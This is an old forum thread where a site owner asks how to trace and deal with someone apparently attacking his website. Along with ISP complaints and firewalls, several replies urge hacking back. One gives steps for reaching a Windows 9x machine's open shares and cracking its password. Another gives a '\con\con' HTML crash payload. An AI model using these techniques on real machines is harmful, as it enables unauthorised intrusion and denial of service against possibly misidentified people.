I have some jerk leaving "bad" stuff on a website of mine. but lets just say he is trying to hack in.
WHAT DO I DO.
i have the ip addresses that he uses but what good is that. I even did a tracert and found that he was in the Beverly MA area
I want to know who it is.

I would look up his ISP, which you can do here, http://packetderm.cotse.com/cgi-bin/lookuptools and report his hacking activities. They'll probably warn him and/or terminate his account.

Try www.samspade.org to get as much info as possible. Does he have a static IP? You could send a complaint to his ISP. Or if he is trying to hack you and you're sure his IP isn't forged you could try to hack him first... (especially if he's just a script kiddie).
If there was a way to force sending of email with javascript, it's probably plugged as someone would have written a virus to exploit it.

Get these: Mozilla Opera OpenBSD
I have books for sale: "MCSD in a Nutshell" and "VB Distributed Exam Cram" - PM me for details. Will also trade for a decent ATX Pentium 2 MB/CPU/RAM combo.

thats what i figured.
I wrote an email to the ISP
I would love to hack an blow up his computer
(hopefully it would be a big explosion, while he was at the computer)
just kidding
a fall down some steps would work just fine
Is there some place to go to get the geographic location of a computer's ip address?

How did you find out where he was by his ip address? Is there a program or website that will tell you this?
Just wondering...

NetBios
When ever a hacker tries to packet me or mess with my site, I beat him at his own game. If he is on a network it is a good possibility that he is sharing some of his drives with full access. To see if he is open dos and type this:
nbtstat -A IP
If he has NetBios enabled you will see a chart, If he has a shared drive you will see the name of his computer and a <20> next to it. if you see the <20> then type his IP in the Start>Find>computer box.
His computer will pop up in the found computers list and your in. If he has a password the look for a program called PQWak and it will break the password Byte by Byte.
PS This only works if he is on Win9x

That's cool VBHack, but I would rather use a firewall to
prevent that from happening.
There's a free for personal use product called 'Tiny Personal Firewall' that beats the hell out of Zone Alarm and Symantec's firewall products. It's great and it really
is tiny.

If hes on a fixed IP address, forward that IP address to a page with this code in it
< IMG SRC="\con\con" >
This will crash unpatched versions of windows, but I only think this works for win9x machines, worth a try thou.

Dunno just will "excute" that same as if you were to type "\con\con" into the run menu and crash the pc.
I think it might be < IMG SRC="file:\\\con\con" >
cant remember exactly.

now thats priceless!
I had some kids submitting all types of stuff to a web site of mine... Media-One finally caught up with them, they havn't been back.
next time I'll tell em to shut down their computer or me and my "boyz" will shut it down for em!

in all seriousness it is important to learn how to hack. Its the only way to make sure your own computer systems are safe.

test site
It is good to know hacking....
And here is a good site to test your security:
www.grc.com
Use the Shield Test & Port Probe utilities. I was quite amazed the first time I ran it over a year ago.
I'm "Full Stealth" now!
